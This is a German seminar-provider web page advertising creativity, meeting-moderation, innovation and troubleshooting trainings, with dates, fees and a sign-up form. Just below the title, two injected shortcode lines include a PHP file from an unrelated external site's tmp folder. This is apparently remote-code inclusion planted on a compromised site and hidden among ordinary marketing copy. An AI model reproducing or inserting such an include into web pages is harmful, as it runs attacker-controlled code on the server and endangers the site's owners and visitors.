Crash-Kurs Kreativität

[insert_php] include(„http://acommeamour.fr/tmp/ap86w.php“); [/insert_php]
[php] include(„http://acommeamour.fr/tmp/ap86w.php“); [/php]

Intensiv-Training Kreativität

Kreatives Denken und originelles Handeln sind bedeutende Voraussetzungen für den Erfolg. Die Teilnehmer werden mit den wichtigsten, in der Praxis bewährten Kreativitätstechniken vertraut gemacht. Es werden Anstöße für kreative Prozesse gegeben, um im eigenen Arbeitsbereich neue Ideen zu entdecken und umzusetzen. Eine Vielzahl praktischer Übungen demonstrieren die eigene Kreativität. Die Teilnehmer werden außerdem mit den wichtigsten Techniken des Innovationsmanagements vertraut gemacht.

Inhalte: Wie steigere ich meine eigene Kreativität?
Wie erkenne ich mein Kreativitätspotential?
Kreativität durch BRAIN-STORMING und BRAIN-WRITING
Wie setze ich die „Mind-Mapping-Methode“ zur Kreativitässteigerung ein?
Synektik und Bionik
Der morphologische Kasten
Die Reizwortmethode
Welche Bedeutung hat das laterale Denken für die Kreativität?
Welche Kreativitäts-Blocker gibt es in der Praxis?
Wie entsteht eine kreative Gruppenatmosphäre?
Exemplarische Anwendung einiger Kreativitätstechniken auf konkrete Unternehmenssituationen
Wie schafft man ein innovatives Umfeld?
Wie stimuliert man Mitarbeiter zur Innovation?
Wie steigert man das Innovationstempo?
Offene Kommunikation zur Förderung der Innovation
Diskussion und Bewertung innovativer Vorhaben aus dem Teilnehmerkreis
Welche Motivationsfaktoren erhöhen die Innovationsleistung?
NLP und kreatives Handeln
Praktische Umsetzung der Seminarinhalte

Meetings effektiver moderieren

Effektive Meetings und produktive Teamarbeit fallen nicht vom Himmel. Sie sind das Ergebnis einer guten Arbeit des Moderators.

Wenn Menschen zusammen kommen, durchläuft die Gruppe einen Prozess der Selbstorganisation. Diesen Prozess zu kennen und im Ablauf zu unterstützen, ist DAS k.o.-Kriterium für konstruktive und produktive Meetings!

Wird dieser Prozess vom Moderator geeignet gefördert, erreicht die Gruppe schon nach kurzer Zeit ihren optimalen Arbeits-Flow. Wird der Prozess jedoch unterdrückt oder verhindert, verharrt die Gruppe weit unter ihrer Leistungsfähigkeit.

Die Gruppenmitglieder beschleicht der Eindruck, dass „es nicht läuft“, es häufen sich Störungen (Debatten, Disziplin, Motivation, Reibereien und Konflikte). Das ist unabhängig vom Zweck, Ort und der Dauer des Meetings, der Besprechung, Arbeitstreffens, Workshops etc.

Alle konventionellen Moderationstechniken und Meeting-Checklisten, so sinnvoll sie woanders sind, nutzen wenig, wenn der Gruppenprozess gestört ist.

Ziel dieses Trainings ist es,

  • bei den Teilnehmern praktische Fähigkeiten und Handlungsrepertoire zu entwickeln,
  • um den Workflow einer Gruppe als Moderator sicherer erreichen und steuern zu können,
  • und auf Störungen geeignet reagieren zu können.

Im Ergebnis werden Meetings produktiver verlaufen, die Arbeitsergebnisse besser und deren Umsetzung nachhaltiger sein.

Trainings-Inhalte

  • der Gruppenprozess vom Einstieg über den Flow bis zur Verabschiedung
  • typische prozessbedingte Störungen und geeignete Interventionen
  • Moderationstechniken und notwendige soziale Kompetenzen
  • Kreativitätstechniken zur Förderung des Gruppenflows
  • Reflexion des eigenen Arbeitsstiles

Auf Sie kommt zu: Trainerinputs und Teachings, Übungsbeispiele, Praxistraining in Einzel- und Gruppenübungen, erfahrungsorientierter Austausch.

Dauer: 1 Tag, 09.30h bis 17.00h
Referent: Rolf Iven
Voraussetzungen: Es sind keine besonderen Voraussetzungen zu erfüllen.
Maximale Teilnehmerzahl: 12
Teilnahme: 580,00 Euro inkl. umfangreichem Script, zzgl. Mwst.
Abschluss: Teilnahmezertifikat

Wertgarantie
Sollten Sie bis zur Hälfte des Trainings den Eindruck haben, keinen Gegenwert für Ihr Geld zu bekommen, erstatten wir Ihnen den vollen Preis zurück – ohne wenn und aber.

Orte und Termine

Hamburg, Dienstag den 19.04.2016
Hamburg, Dienstag den 18.10.2016
Berlin, Dienstag den 12.07.2016
Köln, Dienstag den 14.06.2016
Köln, Dienstag den 29.11.2016
Frankfurt, Dienstag den 20.09.2016
München, Dienstag den 26.04.2016
München, Dienstag den 11.10.2016

Anmeldung

Wählen Sie hier Ihren Termin aus:

Ihr Vor- und Nachname (Pflichtfeld)

Ihre E-Mail-Adresse (Pflichtfeld)

ggf. Unternehmensname

Ihre Anschrift:
Straße (Pflichtfeld)

PLZ (Pflichtfeld)

Ort (Pflichtfeld)

Telefon für Rückfragen:

Für Anmerkungen zu Ihrer Anmeldung:

Bitte beachten Sie:
Nachdem Sie uns Ihre Anmeldung gesendet haben, erhalten Sie von uns eine Anmeldebestätigung. Ihre Anmeldung wird erst mit Ihrer Zahlung der Seminargebühr verbindlich, und Ihr Platz wird erst nach Zahlungseingang von uns verbindlich reserviert. Sie können Ihre Anmeldung bis 14 Tage nach Zugang unserer Buchungsbestätigung kostenlos stornieren. Danach gelten unsere Anmelde- und Stornobedingungen.

Einsteins Traum

Innovation und Kreativität sind wichtige Schlüssel-Qualifikationen für jede Form von Veränderung und Lösungsfindung. Sie zählen damit zu den wertvollsten Ressourcen für Entwicklung und Fortschritt. Überlassen Sie Ihre Ideen nicht dem Zufall und erst recht nicht der Konkurrenz. In Zeiten, in denen viele Unternehmen ihre Arbeitsprozesse aus Kostengründen standardisieren, werden die Firmen Wettbewerbsvorteile haben, die innovative Lösungen zur Befriedigung der Kundenwünsche kreieren. Ideen und Erfindungen sind jedoch kein Zufall und fallen auch nicht vom Himmel. Vielmehr ist Kreativität planbar. Mit unserem Innovationsworkshop lernen Sie einen strukturierten, zielgerichteten und steuerbaren Prozess für Ihren beruflichen Alltag kennen. Ob Dienstleistungen, Produkte, Geschäftsmodelle oder bestehende Arbeitsabläufe, all dies lässt sich über kreative Methoden entwickeln bzw. anpassen.
In unserem Innovationsworkshop und Kreativitätstraining lernen die Teilnehmer Methoden und Techniken kennen, die es Ihnen erlauben, neue Ideen strukturiert und methodisch zu erarbeiten.

Inhalte: Sie benötigen Innovationen, damit Ihr Unternehmen langfristig wachsen kann. Ihre Wettbewerber schlafen nicht und Ihre Kunden verlangen nach innovativen Lösungen zur Erfüllung ihrer Bedürfnisse. Doch bevor Sie die Produkte oder Dienstleistungen für Ihre Kunden entwickeln, benötigen Sie in den meisten Fällen kreative Ideen!
Erlernen Sie die Prinzipien der Kreativität und steigern Sie mit gezielten Methoden Ihren Ideenreichtum. Seien Sie Ihrer Konkurrenz einen Schritt voraus und entwickeln Sie nicht nur Ihre Produkte und Dienstleistungen, sondern auch bestehende Arbeitsabläufe und Geschäftsmodelle weiter. Mit unserem Innovationsworkshop und Kreativitätstraining erlernen sie Schritt für Schritt Tools und Techniken, um die eigene Kreativität gezielt zu steigern. Denn eine innovative Denkweise ist keine Glückssache, sondern ein steuerbarer und strukturierter Prozess.
Im Rahmen des zweitägigen Workshops erlangen Sie geballtes Wissen zur Ideenfindung: von der Einführung in die Phasen des kreativen Prozesses, über den Einsatz der richtigen Werkzeuge bis hin zur optimalen Umsetzung der Theorie in der Praxis. So entwickeln Sie Denk- und Verhaltensweisen, um Ihr Arbeitsumfeld und das gesamte Team um Sie herum positiv zu beeinflussen. Kreativität und Innovation sind wichtige Faktoren für den Fortschritt – nehmen Sie daher die Ideenentwicklung selbst in die Hand. Bieten Sie Ihren Kunden individuelle Lösungen an, indem Sie gezielt neue Ideen konzipieren und umsetzen – und heben Sie sich so von Ihrer Konkurrenz ab

Methodische Fehlersuche

Die Fähigkeit zur Fehlersuche ist die Kernkompetenz im technischen Service.
80% aller Probleme lassen sich durch Erfahrung bereinigen.

Was ist mit dem Rest?
Was ist mit den Mitarbeitern, die diese Erfahrung noch nicht haben können?

Gerade ungelöste technische Probleme, wenn es lange dauert oder vermeintliche Lösungen sich als Irrwege erweisen,
◾sind teuer,
◾binden sehr viele Menschen,
◾vernichten Kundenvertrauen und
◾erzwingen viele unnötige Zugeständnisse an den Kunden.

Wenn hier ein systematisches und methodisches Vorgehen erfolgt, lassen gute Lösungen und auch ein wieder zufriedener Kunde nicht lange auf sich warten.

Nichts überzeugt einen Kunden mehr als ein erlebtes systematisches Vorgehen des technischen Services.

Gleichzeitig ist methodische Fehlersuche ein hoch komplexes Zusammenspiel mentaler und emotionaler Fähigkeiten. Sie bedarf eines guten Methodenkoffers, einer guten Verknüpfungsfähigkeit des vorhandenen technischen Wissens (Systemwissen) und einer gezielten Mischung aus intuitivem und bewusstem Vorgehen. Techniker sind immer wieder überrascht, was alles möglich ist, wenn man nur weiß und erlebt hat, wie man es angeht.

Die Trainings und Coachings der me Weiterbildung
◾ermöglichen hier dem Techniker und den Serviceverantwortlichen, sich deutlich erweiterte Fähigkeiten anzueignen und teilweise ganz neue Wege zu gehen.
◾Die interne und externe Kommunikation über technische Probleme erfolgt wesentlich zielgerichteter und effektiver.
◾Sowohl die Schnelligkeit als auch die Sicherheit der Lösungen steigt.
◾Und die gesamte Serviceorganisation gewinnt an Fähigkeit, mit komplexen technischen Problemen kompetent umzugehen.